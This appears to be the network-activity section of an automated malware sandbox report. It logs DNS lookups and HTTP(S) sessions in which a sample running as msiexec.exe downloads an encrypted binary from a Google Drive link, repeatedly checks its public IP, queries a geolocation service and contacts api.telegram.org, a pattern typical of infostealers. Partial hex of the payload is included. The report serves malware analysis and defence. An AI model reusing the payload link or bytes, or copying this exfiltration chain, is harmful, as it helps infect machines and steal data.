Dec 17, 2024 13:36:54.726969004 CET	443	49948	149.154.167.220	192.168.2.5
Dec 17, 2024 13:36:54.727121115 CET	49948	443	192.168.2.5	149.154.167.220
Dec 17, 2024 13:36:54.727277994 CET	49948	443	192.168.2.5	149.154.167.220

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 17, 2024 13:36:03.978868008 CET	50434	53	192.168.2.5	1.1.1.1
Dec 17, 2024 13:36:04.116836071 CET	53	50434	1.1.1.1	192.168.2.5
Dec 17, 2024 13:36:06.768238068 CET	55848	53	192.168.2.5	1.1.1.1
Dec 17, 2024 13:36:06.906313896 CET	53	55848	1.1.1.1	192.168.2.5
Dec 17, 2024 13:36:12.594434023 CET	58364	53	192.168.2.5	1.1.1.1
Dec 17, 2024 13:36:12.731559992 CET	53	58364	1.1.1.1	192.168.2.5
Dec 17, 2024 13:36:14.935925961 CET	54458	53	192.168.2.5	1.1.1.1
Dec 17, 2024 13:36:15.078018904 CET	53	54458	1.1.1.1	192.168.2.5
Dec 17, 2024 13:36:40.786684036 CET	61664	53	192.168.2.5	1.1.1.1
Dec 17, 2024 13:36:40.925317049 CET	53	61664	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 17, 2024 13:36:03.978868008 CET	192.168.2.5	1.1.1.1	0xb4ea	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)	false
Dec 17, 2024 13:36:06.768238068 CET	192.168.2.5	1.1.1.1	0x9483	Standard query (0)	drive.usercontent.google.com	A (IP address)	IN (0x0001)	false
Dec 17, 2024 13:36:12.594434023 CET	192.168.2.5	1.1.1.1	0x98cc	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Dec 17, 2024 13:36:14.935925961 CET	192.168.2.5	1.1.1.1	0x8a8f	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Dec 17, 2024 13:36:40.786684036 CET	192.168.2.5	1.1.1.1	0x36fa	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 17, 2024 13:36:04.116836071 CET	1.1.1.1	192.168.2.5	0xb4ea	No error (0)	drive.google.com		172.217.19.174	A (IP address)	IN (0x0001)	false
Dec 17, 2024 13:36:06.906313896 CET	1.1.1.1	192.168.2.5	0x9483	No error (0)	drive.usercontent.google.com		142.250.181.97	A (IP address)	IN (0x0001)	false
Dec 17, 2024 13:36:12.731559992 CET	1.1.1.1	192.168.2.5	0x98cc	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 17, 2024 13:36:12.731559992 CET	1.1.1.1	192.168.2.5	0x98cc	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Dec 17, 2024 13:36:12.731559992 CET	1.1.1.1	192.168.2.5	0x98cc	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Dec 17, 2024 13:36:12.731559992 CET	1.1.1.1	192.168.2.5	0x98cc	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Dec 17, 2024 13:36:12.731559992 CET	1.1.1.1	192.168.2.5	0x98cc	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Dec 17, 2024 13:36:12.731559992 CET	1.1.1.1	192.168.2.5	0x98cc	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Dec 17, 2024 13:36:15.078018904 CET	1.1.1.1	192.168.2.5	0x8a8f	No error (0)	reallyfreegeoip.org		172.67.177.134	A (IP address)	IN (0x0001)	false
Dec 17, 2024 13:36:15.078018904 CET	1.1.1.1	192.168.2.5	0x8a8f	No error (0)	reallyfreegeoip.org		104.21.67.152	A (IP address)	IN (0x0001)	false
Dec 17, 2024 13:36:40.925317049 CET	1.1.1.1	192.168.2.5	0x36fa	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

drive.google.com

drive.usercontent.google.com

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49839	132.226.247.73	80	6220	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 13:36:12.856370926 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 17, 2024 13:36:14.208739996 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 12:36:14 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 1469d16a79c60addbf4ee8456f83b29d Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Dec 17, 2024 13:36:14.213044882 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 17, 2024 13:36:14.672534943 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 12:36:14 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 73046139a14f48ad947c2678327e1b88 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Dec 17, 2024 13:36:16.755568981 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 17, 2024 13:36:17.179202080 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 12:36:16 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 8e188597d13ad518543dfd17573542fe Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49857	132.226.247.73	80	6220	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 13:36:18.976991892 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 17, 2024 13:36:20.282059908 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 12:36:20 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 1aa022d19507b9136d304f924e639032 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49864	132.226.247.73	80	6220	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 13:36:22.075090885 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 17, 2024 13:36:23.379806995 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 12:36:23 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 6f11eb11b6057ea3df6706e5ec52060d Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49876	132.226.247.73	80	6220	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 13:36:25.267719984 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 17, 2024 13:36:26.608865023 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 12:36:26 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 0b3d128ece1511a7b8aca1fb65b8c8b6 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49883	132.226.247.73	80	6220	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 13:36:28.406336069 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 17, 2024 13:36:29.773024082 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 12:36:29 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 7822c282184e8b4ff7d720189ea71532 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49892	132.226.247.73	80	6220	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 13:36:31.569571018 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 17, 2024 13:36:32.878972054 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 12:36:32 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: ef536476e0ec49a10b048db554d5c483 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49902	132.226.247.73	80	6220	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 13:36:34.671988010 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 17, 2024 13:36:35.979310036 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 12:36:35 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 5b9921741152d71b88e06203f9fb1287 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49909	132.226.247.73	80	6220	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 13:36:37.774811029 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 17, 2024 13:36:39.078545094 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 12:36:38 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: df8c025e801e919c5e4d24bd1a484e1f Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49817	172.217.19.174	443	6220	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 12:36:05 UTC	216	OUT	GET /uc?export=download&id=1sZt2IUjDQYn1jf1R7CCXbvtdEmsX8dEA HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache
2024-12-17 12:36:06 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 17 Dec 2024 12:36:06 GMT Location: https://drive.usercontent.google.com/download?id=1sZt2IUjDQYn1jf1R7CCXbvtdEmsX8dEA&export=download Strict-Transport-Security: max-age=31536000 Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: script-src 'nonce-6R6voHfafimwJc1GJ6v1Pw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49823	142.250.181.97	443	6220	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 12:36:08 UTC	258	OUT	GET /download?id=1sZt2IUjDQYn1jf1R7CCXbvtdEmsX8dEA&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive
2024-12-17 12:36:11 UTC	4930	IN	HTTP/1.1 200 OK X-GUploader-UploadID: AFiumC5MRvPX6TClXTd6mZB1j-W3TEYwjnoaC7elZ0mtVWrXEdYBOz6awmUItXx3uY9uYtMY Content-Type: application/octet-stream Content-Security-Policy: sandbox Content-Security-Policy: default-src 'none' Content-Security-Policy: frame-ancestors 'none' X-Content-Security-Policy: sandbox Cross-Origin-Opener-Policy: same-origin Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Resource-Policy: same-site X-Content-Type-Options: nosniff Content-Disposition: attachment; filename="dxxXemV86.bin" Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED] Access-Control-Allow-Methods: GET,HEAD,OPTIONS Accept-Ranges: bytes Content-Length: 277056 Last-Modified: Tue, 26 Nov 2024 08:31:02 GMT Date: Tue, 17 Dec 2024 12:36:11 GMT Expires: Tue, 17 Dec 2024 12:36:11 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=3df5BA== Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-17 12:36:11 UTC	4930	IN	Data Raw: 88 9d fc f2 9d f2 0c 6b f3 77 c1 1f ba 53 58 b0 72 c9 22 5b cf a3 69 e7 af ae bd 02 a0 58 a6 5b d1 35 bc d6 81 52 09 e4 b1 88 e8 62 e5 ee 99 d2 49 8d bc 09 0b 11 75 cc 02 5e a3 a4 ae 60 75 a4 3b 3a 5c 7b f8 79 6a 35 cd 9b 50 2c aa b9 13 28 9e 66 8e c5 94 3f be 1e fe 16 24 95 75 82 44 f0 77 2d ab 98 8b 63 16 ff 8f d8 06 dc e4 b4 b5 b0 bf 66 bc d0 b1 24 fa 45 d8 1b c8 83 89 f3 66 63 66 3d 80 67 b0 ba 64 fe 83 84 03 fd e4 99 28 ad 80 26 06 69 80 6d 60 c3 44 d1 3f 6f 98 27 57 c4 c6 03 32 35 a9 b3 07 05 5b f7 f8 ae d8 58 70 a2 9b ec b9 6a 8d a4 e3 be 1a 98 00 b7 09 2c 05 48 6d 83 45 0b 82 b9 57 05 c7 3c 6a 79 63 54 9a 65 a3 6f e5 e0 ef 33 87 59 42 45 ab fe fd 8d ba b1 d1 20 fb f4 3d 61 2c 5b dc 80 62 62 df a5 c3 3c 94 89 55 c1 9e ed b6 7c ff 0f 22 b8 73 60 ae Data Ascii: kwSXr"[iX[5RbIu^`u;:\{yj5P,(f?$uDw-cf$Efcf=gd(&im`D?o'W25[Xpj,HmEW<jycTeo3YBE =a,[bb<U\|"s`
2024-12-17 12:36:11 UTC	4840	IN	Data Raw: b0 2f 34 87 85 5d a0 c3 50 8f 43 4d eb e3 80 0a 8a 2a 51 92 e8 58 43 d0 f2 03 7f b1 7c 7a a4 bc 06 db 26 29 6c 7f 0e b9 10 1f be 4f ca e3 c8 4d c8 54 d9 b1 84 45 be 65 25 f4 18 1a 51 91 6e 6d 65 f6 0f 1f 93 5c 47 c9 41 a2 22 55 86 2a 28 52 65 dc 3c 4c 6a 3f 84 7c 5f c5 26 54 f9 e3 fb 84 72 cf 62 3e 7f fb 60 18 d2 5f 91 04 1f ff be 42 24 23 89 48 98 69 56 70 f4 87 f1 01 2c b8 13 1a d6 10 d5 2c 3a 6c 54 59 9c 2f d6 35 47 f7 5c 9f 62 20 1d 71 99 a3 b0 04 b6 28 f1 c4 d5 c6 41 00 d8 52 81 54 4d 3f 9b e3 c8 24 9e e4 23 91 37 c3 c2 44 80 14 77 af 86 1f f0 2d f9 94 ce 0e 1e 98 76 d7 eb 67 ac 3d ee bd 38 c9 54 f6 47 f1 45 81 5c ad b9 c2 8e ca 1b fc 62 07 14 c0 14 9f fd ef e2 a8 83 d6 c2 3d 18 0f e9 43 bc a6 68 04 e8 87 9d b9 cb 4a 8c 42 08 5c 5c bf e5 54 9b 99 28 Data Ascii: /4]PCMQXC\|z&)lOMTEe%Qnme\GA"U(Re<Lj?\|_&Trb>`_B$#HiVp,,:lTY/5G\b q(ARTM?$#7Dw-vg=8TGE\b=ChJB\\T(
2024-12-17 12:36:11 UTC	1321	IN	Data Raw: f6 b6 f0 85 e1 20 6b 4f 6d 34 4d b3 2b 6d 96 48 4d ff 6d 13 66 e0 fe eb 70 8b 14 dd 74 eb 15 91 40 7e b9 99 ac 58 5f 2d 26 bc 82 d9 8c d7 58 a8 cf a4 09 cd 55 1d 42 9b 94 39 53 c1 25 35 09 66 44 d6 c4 31 3d af d8 08 b4 33 56 5b 3c 57 18 b0 e5 6f 87 38 6c 5d fc 56 7a 9e 35 d3 e8 64 c8 06 65 9c bf dc 84 68 52 c9 a7 92 74 f8 e0 87 62 19 09 5f b6 58 cb 8c 48 f9 65 2b 10 8e 45 15 dd 4a 17 ed 90 8d 17 55 a0 02 d4 99 75 a5 9b 35 6d 70 ee ce 28 69 70 85 0d d3 e0 1c 9a 3a de 81 fe 13 f4 d6 d4 17 6b 92 3c 72 68 a5 cc b5 7b cc f0 09 9e 5e 07 4f 36 38 20 c0 84 59 f1 db 19 fb 3e c5 d4 68 c8 19 e6 71 e2 23 ac fe 62 09 28 46 42 ed c5 89 38 61 cb 8c c1 9b 92 10 e7 7b 4c 1e cb b3 25 c1 dc 13 6e cf 23 c1 b9 9b b5 59 aa 7c 4f 0a c2 82 85 52 ae 9f 21 09 34 60 3b b9 65 a1 00 Data Ascii: kOm4M+mHMmfpt@~X_-&XUB9S%5fD1=3V[<Wo8l]Vz5dehRtb_XHe+EJUu5mp(ip:k<rh{^O68 Y>hq#b(FB8a{L%n#Y\|OR!4`;e
2024-12-17 12:36:11 UTC	1390	IN	Data Raw: 37 f9 30 a6 c7 54 e6 64 cb 3f 3f 54 c2 c8 60 ab d7 33 94 73 03 71 0f 31 87 85 2b 32 a6 f3 65 e2 08 6e 26 ec 2c b9 04 4d 14 9a b6 4d b7 bb f9 ad 75 7e 67 58 d0 e0 f6 be 8f 5a 82 ca 40 52 34 63 58 01 43 74 66 f6 dc 31 1c 5d 04 d9 eb 81 72 1b 9d 74 80 94 36 1c 96 4c 38 91 37 92 22 bf 02 f8 15 c9 b3 26 18 d0 91 52 ab ea b0 0e fd 28 bc 85 0e 5a e6 bd 15 dd f2 c4 6a 5e d1 6b 55 15 2a f1 af 7e 94 82 1e 88 e1 e4 6f a1 d0 bc c6 fb 47 d0 44 01 35 11 1c e9 8d ea 91 ca 7f 1d 73 d1 2f 64 53 79 d7 8a 2e 60 03 2b 2a d1 de db b5 85 c9 46 43 71 67 e9 15 b5 f5 7d b3 60 79 81 5f 19 75 c7 8c a0 10 8b 64 c1 82 6a 15 91 4a 16 70 98 bf 5a 3c 48 1d 7f f0 cf a4 28 77 a8 c5 b6 85 fd 44 39 23 a9 90 e4 4e 4c 6f 23 f7 66 72 c7 a7 99 0a 9f a9 aa 91 24 6a 11 3a 6a 12 12 c6 04 35 f1 62 Data Ascii: 70Td??T`3sq1+2en&,MMu~gXZ@R4cXCtf1]rt6L87"&R(Zj^kU~oGD5s/dSy.`+FCqg}`y_udjJpZ<H(wD9#NLo#fr$j:j5b
2024-12-17 12:36:11 UTC	1390	IN	Data Raw: 4a cf 71 3a dd cf 7a 6a c3 2c 91 74 b7 dc cc 6a 7e 29 e6 8a 9b 06 00 70 8a a6 9e 65 28 cb f4 1a d1 05 d6 a6 74 6a 3b 89 f3 4a dc 24 4a 98 88 98 0d 4c 1d 0f af a4 df 67 c5 e1 fb ab b7 d5 49 74 e5 52 f2 39 3f 5c 93 f0 bc 32 a7 61 2b 86 4e bf 3c 45 99 0e 63 a6 bb 16 92 4e ee fb 0e 1d 18 83 70 d5 af 00 ac 2c ec ab 89 0d 54 e7 4b dd 4d 81 52 bc 86 c2 8e c4 33 eb 73 03 71 c2 d8 9f f7 e8 3c b7 8b b9 fd 11 10 1a 92 17 bd a6 6c 7d 54 5b 43 bd a4 96 88 6e 0a 4d 49 d8 f5 52 f4 5d 28 79 ce 40 33 90 24 e2 01 43 74 09 82 b8 31 16 48 25 1c 76 e4 5a 2f 9c 51 9c f5 13 0e be 5e 9a b4 2a 64 96 bf 02 f2 c9 d9 ab 54 d5 ac f2 20 09 bf bf 58 44 28 bc 8b ba 81 fd dc 35 cf f9 8d 03 77 a4 6b 2b 34 39 d3 bd 7e 09 82 1e 88 f2 c8 11 9b d0 bc ea fe 2a c0 4e 71 23 47 a2 e9 8d e4 96 15 Data Ascii: Jq:zj,tj~)pe(tj;J$JLgItR9?\2a+N<EcNp,TKMR3sq<l}T[CnMIR](y@3$Ct1H%vZ/Q^dT XD(5wk+49~Nq#G
